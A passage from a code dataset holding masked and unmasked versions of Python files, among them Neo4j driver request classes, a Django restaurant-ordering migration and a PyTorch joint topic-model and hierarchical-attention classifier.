self.credentials = credentials\n self.realm = realm\n self.ticket = ticket\n",
"step-3": "<mask token>\n\n\nclass NewSession:\n <mask token>\n\n\nclass SessionClose:\n\n def __init__(self, sessionId):\n self.sessionId = sessionId\n\n\n<mask token>\n\n\nclass SessionRun:\n\n def __init__(self, sessionId, cypher, params):\n self.sessionId = sessionId\n self.cypher = cypher\n self.params = params\n\n\nclass SessionReadTransaction:\n\n def __init__(self, sessionId):\n self.sessionId = sessionId\n\n\n<mask token>\n\n\nclass RetryablePositive:\n\n def __init__(self, sessionId):\n self.sessionId = sessionId\n\n\n<mask token>\n\n\nclass RetryableNegative:\n\n def __init__(self, sessionId, errorId=''):\n self.sessionId = sessionId\n self.errorId = errorId\n\n\nclass TransactionRun:\n\n def __init__(self, txId, cypher, params):\n self.txId = txId\n self.cypher = cypher\n self.params = params\n\n\n<mask token>\n\n\nclass ResultNext:\n\n def __init__(self, resultId):\n self.resultId = resultId\n\n\nclass AuthorizationToken:\n\n def __init__(self, scheme='none', principal='', credentials='', realm=\n '', ticket=''):\n self.scheme = scheme\n self.principal = principal\n self.credentials = credentials\n self.realm = realm\n self.ticket = ticket\n",
"step-4": "<mask token>\n\n\nclass DriverClose:\n <mask token>\n\n\nclass NewSession:\n\n def __init__(self, driverId, accessMode, bookmarks):\n self.driverId = driverId\n self.accessMode = accessMode\n self.bookmarks = bookmarks\n\n\nclass SessionClose:\n\n def __init__(self, sessionId):\n self.sessionId = sessionId\n\n\n<mask token>\n\n\nclass SessionRun:\n\n def __init__(self, sessionId, cypher, params):\n self.sessionId = sessionId\n self.cypher = cypher\n self.params = params\n\n\nclass SessionReadTransaction:\n\n def __init__(self, sessionId):\n self.sessionId = sessionId\n\n\n<mask token>\n\n\nclass RetryablePositive:\n\n def __init__(self, sessionId):\n self.sessionId = sessionId\n\n\n<mask token>\n\n\nclass RetryableNegative:\n\n def __init__(self, sessionId, errorId=''):\n self.sessionId = sessionId\n self.errorId = errorId\n\n\nclass TransactionRun:\n\n def __init__(self, txId, cypher, params):\n self.txId = txId\n self.cypher = cypher\n self.params = params\n\n\n<mask token>\n\n\nclass ResultNext:\n\n def __init__(self, resultId):\n self.resultId = resultId\n\n\nclass AuthorizationToken:\n\n def __init__(self, scheme='none', principal='', credentials='', realm=\n '', ticket=''):\n self.scheme = scheme\n self.principal = principal\n self.credentials = credentials\n self.realm = realm\n self.ticket = ticket\n",
"step-5": "\n\"\"\"\nAll requests will be sent to backend as:\n {\n name: <class name>,\n data: {\n <all instance variables>\n }\n }\n\"\"\"\n\nclass NewDriver:\n def __init__(self, uri, authToken):\n self.uri = uri\n self.authorizationToken = authToken\n\n\nclass DriverClose:\n def __init__(self, driverId):\n self.driverId = driverId\n\n\nclass NewSession:\n def __init__(self, driverId, accessMode, bookmarks):\n self.driverId = driverId\n self.accessMode = accessMode\n self.bookmarks = bookmarks\n\n\nclass SessionClose:\n def __init__(self, sessionId):\n self.sessionId = sessionId\n\n\n\"\"\"\nResponse should be Result model or raised Error model\n\"\"\"\nclass SessionRun:\n def __init__(self, sessionId, cypher, params):\n self.sessionId = sessionId\n self.cypher = cypher\n self.params = params\n\n\nclass SessionReadTransaction:\n def __init__(self, sessionId):\n self.sessionId = sessionId\n\n\n\"\"\"\nIndicates a positive intent from the client application to commit the retryable transaction\n\"\"\"\nclass RetryablePositive:\n def __init__(self, sessionId):\n self.sessionId = sessionId\n\n\n\"\"\"\nIndicates a negative intent from the client application to commit the retryable transaction\n\"\"\"\nclass RetryableNegative:\n def __init__(self, sessionId, errorId=\"\"):\n self.sessionId = sessionId\n self.errorId = errorId\n\n\nclass TransactionRun:\n def __init__(self, txId, cypher, params):\n self.txId = txId\n self.cypher = cypher\n self.params = params\n\n\n\"\"\"\nResponse should be Record model, NullRecord to indicate last record or raised Error model if record\ncouldn't be retrieved.\n\"\"\"\nclass ResultNext:\n def __init__(self, resultId):\n self.resultId = resultId\n\n\nclass AuthorizationToken:\n def __init__(self, scheme=\"none\", principal=\"\", credentials=\"\", realm=\"\", ticket=\"\"):\n self.scheme=scheme\n self.principal=principal\n self.credentials=credentials\n self.realm=realm\n self.ticket=ticket\n\n",
"step-ids": [
14,
16,
17,
19,
23
]
}
|
[
14,
16,
17,
19,
23
] |
from adb_local_installer.connection import ADBConnection
with ADBConnection("a95x01", domain="dohmens.local") as conn:
print(conn.conn)
|
normal
|
{
"blob_id": "6f583fde0eeab84984629b795e428300503a49c9",
"index": 9852,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwith ADBConnection('a95x01', domain='dohmens.local') as conn:\n print(conn.conn)\n",
"step-3": "from adb_local_installer.connection import ADBConnection\nwith ADBConnection('a95x01', domain='dohmens.local') as conn:\n print(conn.conn)\n",
"step-4": "from adb_local_installer.connection import ADBConnection\n\n\nwith ADBConnection(\"a95x01\", domain=\"dohmens.local\") as conn:\n print(conn.conn)",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
# Generated by Django 2.1.5 on 2019-01-21 22:51
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Customer',
fields=[
('phone_number', models.CharField(max_length=232, primary_key=True, serialize=False)),
('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, related_name='customer', to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Dish',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=232)),
('category', models.CharField(max_length=232)),
('picture', models.ImageField(upload_to='uploads/')),
('description', models.TextField(null=True)),
('price', models.DecimalField(decimal_places=2, max_digits=10)),
],
),
migrations.CreateModel(
name='DishCount',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('count', models.IntegerField(default=1)),
('dish', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='main.Dish')),
],
),
migrations.CreateModel(
name='Order',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('meal_date_time', models.DateTimeField()),
('comment', models.TextField(max_length=232, null=True)),
('person_count', models.IntegerField(default=1)),
('status', models.IntegerField(choices=[('NEW', 1), ('IN PROGRESS', 2), ('READY TO MEAL', 3), ('FINISHED', 4)], default=1)),
('customer', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='main.Customer')),
('dishes', models.ManyToManyField(through='main.DishCount', to='main.Dish')),
],
),
migrations.CreateModel(
name='Restaurant',
fields=[
('name', models.CharField(max_length=232)),
('description', models.TextField(max_length=232)),
('picture', models.ImageField(upload_to='uploads/')),
('phone_number', models.CharField(max_length=232, primary_key=True, serialize=False)),
('coord_x', models.DecimalField(decimal_places=10, max_digits=40)),
('coord_y', models.DecimalField(decimal_places=10, max_digits=40)),
('dishes', models.ManyToManyField(to='main.Dish')),
('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.AddField(
model_name='order',
name='restaurant',
field=models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='main.Restaurant'),
),
migrations.AddField(
model_name='dishcount',
name='order',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='main.Order'),
),
]
|
normal
|
{
"blob_id": "a6cb7a134fb8480d344743bcb7bc8766146d256f",
"index": 8238,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n initial = True\n dependencies = [migrations.swappable_dependency(settings.AUTH_USER_MODEL)]\n operations = [migrations.CreateModel(name='Customer', fields=[(\n 'phone_number', models.CharField(max_length=232, primary_key=True,\n serialize=False)), ('user', models.OneToOneField(on_delete=django.\n db.models.deletion.CASCADE, related_name='customer', to=settings.\n AUTH_USER_MODEL))]), migrations.CreateModel(name='Dish', fields=[(\n 'id', models.AutoField(auto_created=True, primary_key=True,\n serialize=False, verbose_name='ID')), ('name', models.CharField(\n max_length=232)), ('category', models.CharField(max_length=232)), (\n 'picture', models.ImageField(upload_to='uploads/')), ('description',\n models.TextField(null=True)), ('price', models.DecimalField(\n decimal_places=2, max_digits=10))]), migrations.CreateModel(name=\n 'DishCount', fields=[('id', models.AutoField(auto_created=True,\n primary_key=True, serialize=False, verbose_name='ID')), ('count',\n models.IntegerField(default=1)), ('dish', models.ForeignKey(\n on_delete=django.db.models.deletion.CASCADE, to='main.Dish'))]),\n migrations.CreateModel(name='Order', fields=[('id', models.\n AutoField(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')), ('meal_date_time', models.DateTimeField()), (\n 'comment', models.TextField(max_length=232, null=True)), (\n 'person_count', models.IntegerField(default=1)), ('status', models.\n IntegerField(choices=[('NEW', 1), ('IN PROGRESS', 2), (\n 'READY TO MEAL', 3), ('FINISHED', 4)], default=1)), ('customer',\n models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING,\n to='main.Customer')), ('dishes', models.ManyToManyField(through=\n 'main.DishCount', to='main.Dish'))]), migrations.CreateModel(name=\n 'Restaurant', fields=[('name', models.CharField(max_length=232)), (\n 'description', models.TextField(max_length=232)), ('picture',\n models.ImageField(upload_to='uploads/')), ('phone_number', models.\n CharField(max_length=232, primary_key=True, serialize=False)), (\n 'coord_x', models.DecimalField(decimal_places=10, max_digits=40)),\n ('coord_y', models.DecimalField(decimal_places=10, max_digits=40)),\n ('dishes', models.ManyToManyField(to='main.Dish')), ('user', models\n .OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=\n settings.AUTH_USER_MODEL))]), migrations.AddField(model_name=\n 'order', name='restaurant', field=models.ForeignKey(on_delete=\n django.db.models.deletion.DO_NOTHING, to='main.Restaurant')),\n migrations.AddField(model_name='dishcount', name='order', field=\n models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=\n 'main.Order'))]\n",
"step-4": "from django.conf import settings\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n initial = True\n dependencies = [migrations.swappable_dependency(settings.AUTH_USER_MODEL)]\n operations = [migrations.CreateModel(name='Customer', fields=[(\n 'phone_number', models.CharField(max_length=232, primary_key=True,\n serialize=False)), ('user', models.OneToOneField(on_delete=django.\n db.models.deletion.CASCADE, related_name='customer', to=settings.\n AUTH_USER_MODEL))]), migrations.CreateModel(name='Dish', fields=[(\n 'id', models.AutoField(auto_created=True, primary_key=True,\n serialize=False, verbose_name='ID')), ('name', models.CharField(\n max_length=232)), ('category', models.CharField(max_length=232)), (\n 'picture', models.ImageField(upload_to='uploads/')), ('description',\n models.TextField(null=True)), ('price', models.DecimalField(\n decimal_places=2, max_digits=10))]), migrations.CreateModel(name=\n 'DishCount', fields=[('id', models.AutoField(auto_created=True,\n primary_key=True, serialize=False, verbose_name='ID')), ('count',\n models.IntegerField(default=1)), ('dish', models.ForeignKey(\n on_delete=django.db.models.deletion.CASCADE, to='main.Dish'))]),\n migrations.CreateModel(name='Order', fields=[('id', models.\n AutoField(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')), ('meal_date_time', models.DateTimeField()), (\n 'comment', models.TextField(max_length=232, null=True)), (\n 'person_count', models.IntegerField(default=1)), ('status', models.\n IntegerField(choices=[('NEW', 1), ('IN PROGRESS', 2), (\n 'READY TO MEAL', 3), ('FINISHED', 4)], default=1)), ('customer',\n models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING,\n to='main.Customer')), ('dishes', models.ManyToManyField(through=\n 'main.DishCount', to='main.Dish'))]), migrations.CreateModel(name=\n 'Restaurant', fields=[('name', models.CharField(max_length=232)), (\n 'description', models.TextField(max_length=232)), ('picture',\n models.ImageField(upload_to='uploads/')), ('phone_number', models.\n CharField(max_length=232, primary_key=True, serialize=False)), (\n 'coord_x', models.DecimalField(decimal_places=10, max_digits=40)),\n ('coord_y', models.DecimalField(decimal_places=10, max_digits=40)),\n ('dishes', models.ManyToManyField(to='main.Dish')), ('user', models\n .OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=\n settings.AUTH_USER_MODEL))]), migrations.AddField(model_name=\n 'order', name='restaurant', field=models.ForeignKey(on_delete=\n django.db.models.deletion.DO_NOTHING, to='main.Restaurant')),\n migrations.AddField(model_name='dishcount', name='order', field=\n models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=\n 'main.Order'))]\n",
"step-5": "# Generated by Django 2.1.5 on 2019-01-21 22:51\n\nfrom django.conf import settings\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Customer',\n fields=[\n ('phone_number', models.CharField(max_length=232, primary_key=True, serialize=False)),\n ('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, related_name='customer', to=settings.AUTH_USER_MODEL)),\n ],\n ),\n migrations.CreateModel(\n name='Dish',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('name', models.CharField(max_length=232)),\n ('category', models.CharField(max_length=232)),\n ('picture', models.ImageField(upload_to='uploads/')),\n ('description', models.TextField(null=True)),\n ('price', models.DecimalField(decimal_places=2, max_digits=10)),\n ],\n ),\n migrations.CreateModel(\n name='DishCount',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('count', models.IntegerField(default=1)),\n ('dish', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='main.Dish')),\n ],\n ),\n migrations.CreateModel(\n name='Order',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('meal_date_time', models.DateTimeField()),\n ('comment', models.TextField(max_length=232, null=True)),\n ('person_count', models.IntegerField(default=1)),\n ('status', models.IntegerField(choices=[('NEW', 1), ('IN PROGRESS', 2), ('READY TO MEAL', 3), ('FINISHED', 4)], default=1)),\n ('customer', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='main.Customer')),\n ('dishes', models.ManyToManyField(through='main.DishCount', to='main.Dish')),\n ],\n ),\n migrations.CreateModel(\n name='Restaurant',\n fields=[\n ('name', models.CharField(max_length=232)),\n ('description', models.TextField(max_length=232)),\n ('picture', models.ImageField(upload_to='uploads/')),\n ('phone_number', models.CharField(max_length=232, primary_key=True, serialize=False)),\n ('coord_x', models.DecimalField(decimal_places=10, max_digits=40)),\n ('coord_y', models.DecimalField(decimal_places=10, max_digits=40)),\n ('dishes', models.ManyToManyField(to='main.Dish')),\n ('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),\n ],\n ),\n migrations.AddField(\n model_name='order',\n name='restaurant',\n field=models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='main.Restaurant'),\n ),\n migrations.AddField(\n model_name='dishcount',\n name='order',\n field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='main.Order'),\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import torch
from torch import nn
import torch.nn.functional as F
class JointModel(nn.Module):
def __init__(self, d_v, d_e, d_t, encoder_layers, generator_layers,encoder_shortcut, generator_shortcut, generator_transform,
num_word, emb_size, word_rnn_size, word_rnn_num_layer, word_rnn_dropout, word_rnn_bidirectional,word_attention_size,
context_rnn_size, context_rnn_num_layer, context_rnn_dropout, context_rnn_bidirectional,context_attention_size, mlp_size,
num_label, pretrained_embedding):
super(JointModel, self).__init__()
##NGTM:
self.d_v = d_v # vocabulary size
self.d_e = d_e # dimensionality of encoder
self.d_t = d_t # number of topics
self.encoder_layers = encoder_layers
self.generator_layers = generator_layers
self.generator_transform = generator_transform # transform to apply after the generator
self.encoder_shortcut = encoder_shortcut
self.generator_shortcut = generator_shortcut
self.en1_fc = nn.Linear(self.d_v, self.d_e)
self.en2_fc = nn.Linear(self.d_e, self.d_e)
self.en_drop = nn.Dropout(0.2)
self.mean_fc = nn.Linear(self.d_e, self.d_t)
# self.mean_bn = nn.BatchNorm1d(self.d_t)
self.logvar_fc = nn.Linear(self.d_e, self.d_t)
# self.logvar_bn = nn.BatchNorm1d(self.d_t)
self.generator1 = nn.Linear(self.d_t, self.d_t)
self.generator2 = nn.Linear(self.d_t, self.d_t)
self.generator3 = nn.Linear(self.d_t, self.d_t)
self.generator4 = nn.Linear(self.d_t, self.d_t)
self.r_drop = nn.Dropout(0.2)
self.de = nn.Linear(self.d_t, self.d_v)
# self.de_bn = nn.BatchNorm1d(self.d_v)
##HAN:
self.emb_size = emb_size
self.word_rnn_size = word_rnn_size
self.word_rnn_num_layer = word_rnn_num_layer
self.word_rnn_bidirectional = word_rnn_bidirectional
self.context_rnn_size = context_rnn_size
self.context_rnn_num_layer = context_rnn_num_layer
self.context_rnn_bidirectional = context_rnn_bidirectional
self.num_label = num_label
self.embedding = nn.Embedding(num_word, emb_size)
self.word_rnn = nn.GRU(input_size=emb_size, hidden_size=word_rnn_size, dropout=word_rnn_dropout,
num_layers=word_rnn_num_layer, bidirectional=word_rnn_bidirectional)
word_rnn_output_size = word_rnn_size * 2 if word_rnn_bidirectional else word_rnn_size
self.word_conv_attention_linear = nn.Linear(word_rnn_output_size, self.d_t, bias=False)
self.word_conv_attention_linear2 = nn.Linear(self.d_t, 1, bias=False)
self.context_rnn = nn.GRU(input_size=word_rnn_output_size, hidden_size=context_rnn_size,dropout=context_rnn_dropout,
num_layers=context_rnn_num_layer, bidirectional=context_rnn_bidirectional)
context_rnn_output_size = context_rnn_size * 2 if context_rnn_bidirectional else context_rnn_size
self.context_conv_attention_linear = nn.Linear(context_rnn_output_size, 1, bias=False)
self.classifier = nn.Sequential(nn.Linear(context_rnn_output_size, mlp_size),
nn.LeakyReLU(),
nn.Linear(mlp_size, num_label),
nn.Tanh())
if pretrained_embedding is not None:
self.embedding.weight.data = self.embedding.weight.data.new(pretrained_embedding)
def encoder(self, x):
if self.encoder_layers == 1:
pi = F.relu(self.en1_fc(x))
if self.encoder_shortcut:
pi = self.en_drop(pi)
else:
pi = F.relu(self.en1_fc(x))
pi = F.relu(self.en2_fc(pi))
if self.encoder_shortcut:
pi = self.en_drop(pi)
# mean = self.mean_bn(self.mean_fc(pi))
# logvar = self.logvar_bn(self.logvar_fc(pi))
mean = self.mean_fc(pi)
logvar = self.logvar_fc(pi)
return mean, logvar
def sampler(self, mean, logvar, cuda):
eps = torch.randn(mean.size()).cuda(cuda)
sigma = torch.exp(logvar)
h = sigma.mul(eps).add_(mean)
return h
def generator(self, h):
# temp = self.generator1(h)
# if self.generator_shortcut:
# r = F.tanh(temp) + h
# else:
# r = temp
if self.generator_layers == 0:
r = h
elif self.generator_layers == 1:
temp = self.generator1(h)
if self.generator_shortcut:
r = F.tanh(temp) + h
else:
r = temp
elif self.generator_layers == 2:
temp = F.tanh(self.generator1(h))
temp2 = self.generator2(temp)
if self.generator_shortcut:
r = F.tanh(temp2) + h
else:
r = temp2
else:
temp = F.tanh(self.generator1(h))
temp2 = F.tanh(self.generator2(temp))
temp3 = F.tanh(self.generator3(temp2))
temp4 = self.generator4(temp3)
if self.generator_shortcut:
r = F.tanh(temp4) + h
else:
r = temp4
if self.generator_transform == 'tanh':
return self.r_drop(F.tanh(r))
elif self.generator_transform == 'softmax':
return self.r_drop(F.softmax(r)[0])
elif self.generator_transform == 'relu':
return self.r_drop(F.relu(r))
else:
return self.r_drop(r)
def decoder(self, r):
# p_x_given_h = F.softmax(self.de_bn(self.de(r)))
p_x_given_h = F.softmax(self.de(r))
return p_x_given_h
def init_rnn_hidden(self, batch_size, level):
param_data = next(self.parameters()).data
if level == "word":
bidirectional_multipier = 2 if self.word_rnn_bidirectional else 1
layer_size = self.word_rnn_num_layer * bidirectional_multipier
word_rnn_init_hidden = param_data.new(layer_size, batch_size, self.word_rnn_size).zero_()
return word_rnn_init_hidden
elif level == "context":
bidirectional_multipier = 2 if self.context_rnn_bidirectional else 1
layer_size = self.context_rnn_num_layer * bidirectional_multipier
context_rnn_init_hidden = param_data.new(layer_size, batch_size, self.context_rnn_size).zero_()
return context_rnn_init_hidden
else:
raise Exception("level must be 'word' or 'context'")
def continuous_parameters(self):
for name, param in self.named_parameters():
if not name.startswith("selector"):
yield param
def discrete_parameters(self):
for name, param in self.named_parameters():
if name.startswith("selector"):
yield param
def forward(self, x, x_indices, input_list, length_list, cuda):
###topic model
mean, logvar = self.encoder(x) # batchsize*50
h = self.sampler(mean, logvar, cuda) # batchsize*50
r = self.generator(h) # batchsize*50
p_x_given_h = self.decoder(r) # batchsize*dv
###HAN
num_utterance = len(input_list) # one batch doucument_list
_, batch_size = input_list[0].size()
# word-level rnn
word_rnn_hidden = self.init_rnn_hidden(batch_size, level="word")
word_rnn_output_list = []
word_attention_dict = {}
# de_weight = torch.zeros(self.d_v, self.d_t).cuda()
# de_weight.copy_(self.de.weight.data)
for utterance_index in range(num_utterance):
word_rnn_input = self.embedding(input_list[utterance_index])
word_rnn_output, word_rnn_hidden = self.word_rnn(word_rnn_input, word_rnn_hidden)
word_attention_weight = self.word_conv_attention_linear(word_rnn_output)
# word_attention_weight = Variable(torch.zeros(word_attention_weight.size()).cuda())
batch_data = input_list[utterance_index]
for word_i in range(len(batch_data)): # word_i word
for clause_i in range(len(batch_data[word_i])): # clause_i data(batch)
word_index = int(batch_data[word_i, clause_i]) # word index
if word_index < self.d_v:
if word_index in word_attention_dict:
word_attention_dict[word_index] = (word_attention_dict[word_index] + word_attention_weight[word_i, clause_i,:]) / 2
else:
word_attention_dict[word_index] = word_attention_weight[word_i, clause_i, :]
##HAN
word_attention_weight = self.word_conv_attention_linear2(word_attention_weight)
word_attention_weight = nn.functional.relu(word_attention_weight)
word_attention_weight = nn.functional.softmax(word_attention_weight, dim=0)
word_rnn_last_output = torch.mul(word_rnn_output, word_attention_weight).sum(dim=0)
word_rnn_output_list.append(word_rnn_last_output)
word_rnn_hidden = word_rnn_hidden.detach()
# context-level rnn
context_rnn_hidden = self.init_rnn_hidden(batch_size, level="context")
context_rnn_input = torch.stack(word_rnn_output_list, dim=0)
context_rnn_output, context_rnn_hidden = self.context_rnn(context_rnn_input, context_rnn_hidden)
context_attention_weight = self.context_conv_attention_linear(context_rnn_output)
context_attention_weight = nn.functional.relu(context_attention_weight)
context_attention_weight = nn.functional.softmax(context_attention_weight, dim=0)
context_rnn_last_output = torch.mul(context_rnn_output, context_attention_weight).sum(dim=0)
classifier_input = context_rnn_last_output
logit = self.classifier(classifier_input)
return mean, logvar, p_x_given_h, logit, word_attention_dict
|
normal
|
{
"blob_id": "4f3e297b6925f8d65aacaa59bb837e746747c33f",
"index": 2608,
"step-1": "<mask token>\n\n\nclass JointModel(nn.Module):\n\n def __init__(self, d_v, d_e, d_t, encoder_layers, generator_layers,\n encoder_shortcut, generator_shortcut, generator_transform, num_word,\n emb_size, word_rnn_size, word_rnn_num_layer, word_rnn_dropout,\n word_rnn_bidirectional, word_attention_size, context_rnn_size,\n context_rnn_num_layer, context_rnn_dropout,\n context_rnn_bidirectional, context_attention_size, mlp_size,\n num_label, pretrained_embedding):\n super(JointModel, self).__init__()\n self.d_v = d_v\n self.d_e = d_e\n self.d_t = d_t\n self.encoder_layers = encoder_layers\n self.generator_layers = generator_layers\n self.generator_transform = generator_transform\n self.encoder_shortcut = encoder_shortcut\n self.generator_shortcut = generator_shortcut\n self.en1_fc = nn.Linear(self.d_v, self.d_e)\n self.en2_fc = nn.Linear(self.d_e, self.d_e)\n self.en_drop = nn.Dropout(0.2)\n self.mean_fc = nn.Linear(self.d_e, self.d_t)\n self.logvar_fc = nn.Linear(self.d_e, self.d_t)\n self.generator1 = nn.Linear(self.d_t, self.d_t)\n self.generator2 = nn.Linear(self.d_t, self.d_t)\n self.generator3 = nn.Linear(self.d_t, self.d_t)\n self.generator4 = nn.Linear(self.d_t, self.d_t)\n self.r_drop = nn.Dropout(0.2)\n self.de = nn.Linear(self.d_t, self.d_v)\n self.emb_size = emb_size\n self.word_rnn_size = word_rnn_size\n self.word_rnn_num_layer = word_rnn_num_layer\n self.word_rnn_bidirectional = word_rnn_bidirectional\n self.context_rnn_size = context_rnn_size\n self.context_rnn_num_layer = context_rnn_num_layer\n self.context_rnn_bidirectional = context_rnn_bidirectional\n self.num_label = num_label\n self.embedding = nn.Embedding(num_word, emb_size)\n self.word_rnn = nn.GRU(input_size=emb_size, hidden_size=\n word_rnn_size, dropout=word_rnn_dropout, num_layers=\n word_rnn_num_layer, bidirectional=word_rnn_bidirectional)\n word_rnn_output_size = (word_rnn_size * 2 if word_rnn_bidirectional\n else word_rnn_size)\n self.word_conv_attention_linear = nn.Linear(word_rnn_output_size,\n self.d_t, bias=False)\n self.word_conv_attention_linear2 = nn.Linear(self.d_t, 1, bias=False)\n self.context_rnn = nn.GRU(input_size=word_rnn_output_size,\n hidden_size=context_rnn_size, dropout=context_rnn_dropout,\n num_layers=context_rnn_num_layer, bidirectional=\n context_rnn_bidirectional)\n context_rnn_output_size = (context_rnn_size * 2 if\n context_rnn_bidirectional else context_rnn_size)\n self.context_conv_attention_linear = nn.Linear(context_rnn_output_size,\n 1, bias=False)\n self.classifier = nn.Sequential(nn.Linear(context_rnn_output_size,\n mlp_size), nn.LeakyReLU(), nn.Linear(mlp_size, num_label), nn.\n Tanh())\n if pretrained_embedding is not None:\n self.embedding.weight.data = self.embedding.weight.data.new(\n pretrained_embedding)\n\n def encoder(self, x):\n if self.encoder_layers == 1:\n pi = F.relu(self.en1_fc(x))\n if self.encoder_shortcut:\n pi = self.en_drop(pi)\n else:\n pi = F.relu(self.en1_fc(x))\n pi = F.relu(self.en2_fc(pi))\n if self.encoder_shortcut:\n pi = self.en_drop(pi)\n mean = self.mean_fc(pi)\n logvar = self.logvar_fc(pi)\n return mean, logvar\n <mask token>\n\n def generator(self, h):\n if self.generator_layers == 0:\n r = h\n elif self.generator_layers == 1:\n temp = self.generator1(h)\n if self.generator_shortcut:\n r = F.tanh(temp) + h\n else:\n r = temp\n elif self.generator_layers == 2:\n temp = F.tanh(self.generator1(h))\n temp2 = self.generator2(temp)\n if self.generator_shortcut:\n r = F.tanh(temp2) + h\n else:\n r = temp2\n else:\n temp = F.tanh(self.generator1(h))\n temp2 = F.tanh(self.generator2(temp))\n temp3 = F.tanh(self.generator3(temp2))\n temp4 = self.generator4(temp3)\n if self.generator_shortcut:\n r = F.tanh(temp4) + h\n else:\n r = temp4\n if self.generator_transform == 'tanh':\n return self.r_drop(F.tanh(r))\n elif self.generator_transform == 'softmax':\n return self.r_drop(F.softmax(r)[0])\n elif self.generator_transform == 'relu':\n return self.r_drop(F.relu(r))\n else:\n return self.r_drop(r)\n <mask token>\n <mask token>\n <mask token>\n\n def discrete_parameters(self):\n for name, param in self.named_parameters():\n if name.startswith('selector'):\n yield param\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass JointModel(nn.Module):\n\n def __init__(self, d_v, d_e, d_t, encoder_layers, generator_layers,\n encoder_shortcut, generator_shortcut, generator_transform, num_word,\n emb_size, word_rnn_size, word_rnn_num_layer, word_rnn_dropout,\n word_rnn_bidirectional, word_attention_size, context_rnn_size,\n context_rnn_num_layer, context_rnn_dropout,\n context_rnn_bidirectional, context_attention_size, mlp_size,\n num_label, pretrained_embedding):\n super(JointModel, self).__init__()\n self.d_v = d_v\n self.d_e = d_e\n self.d_t = d_t\n self.encoder_layers = encoder_layers\n self.generator_layers = generator_layers\n self.generator_transform = generator_transform\n self.encoder_shortcut = encoder_shortcut\n self.generator_shortcut = generator_shortcut\n self.en1_fc = nn.Linear(self.d_v, self.d_e)\n self.en2_fc = nn.Linear(self.d_e, self.d_e)\n self.en_drop = nn.Dropout(0.2)\n self.mean_fc = nn.Linear(self.d_e, self.d_t)\n self.logvar_fc = nn.Linear(self.d_e, self.d_t)\n self.generator1 = nn.Linear(self.d_t, self.d_t)\n self.generator2 = nn.Linear(self.d_t, self.d_t)\n self.generator3 = nn.Linear(self.d_t, self.d_t)\n self.generator4 = nn.Linear(self.d_t, self.d_t)\n self.r_drop = nn.Dropout(0.2)\n self.de = nn.Linear(self.d_t, self.d_v)\n self.emb_size = emb_size\n self.word_rnn_size = word_rnn_size\n self.word_rnn_num_layer = word_rnn_num_layer\n self.word_rnn_bidirectional = word_rnn_bidirectional\n self.context_rnn_size = context_rnn_size\n self.context_rnn_num_layer = context_rnn_num_layer\n self.context_rnn_bidirectional = context_rnn_bidirectional\n self.num_label = num_label\n self.embedding = nn.Embedding(num_word, emb_size)\n self.word_rnn = nn.GRU(input_size=emb_size, hidden_size=\n word_rnn_size, dropout=word_rnn_dropout, num_layers=\n word_rnn_num_layer, bidirectional=word_rnn_bidirectional)\n word_rnn_output_size = (word_rnn_size * 2 if word_rnn_bidirectional\n else word_rnn_size)\n self.word_conv_attention_linear = nn.Linear(word_rnn_output_size,\n self.d_t, bias=False)\n self.word_conv_attention_linear2 = nn.Linear(self.d_t, 1, bias=False)\n self.context_rnn = nn.GRU(input_size=word_rnn_output_size,\n hidden_size=context_rnn_size, dropout=context_rnn_dropout,\n num_layers=context_rnn_num_layer, bidirectional=\n context_rnn_bidirectional)\n context_rnn_output_size = (context_rnn_size * 2 if\n context_rnn_bidirectional else context_rnn_size)\n self.context_conv_attention_linear = nn.Linear(context_rnn_output_size,\n 1, bias=False)\n self.classifier = nn.Sequential(nn.Linear(context_rnn_output_size,\n mlp_size), 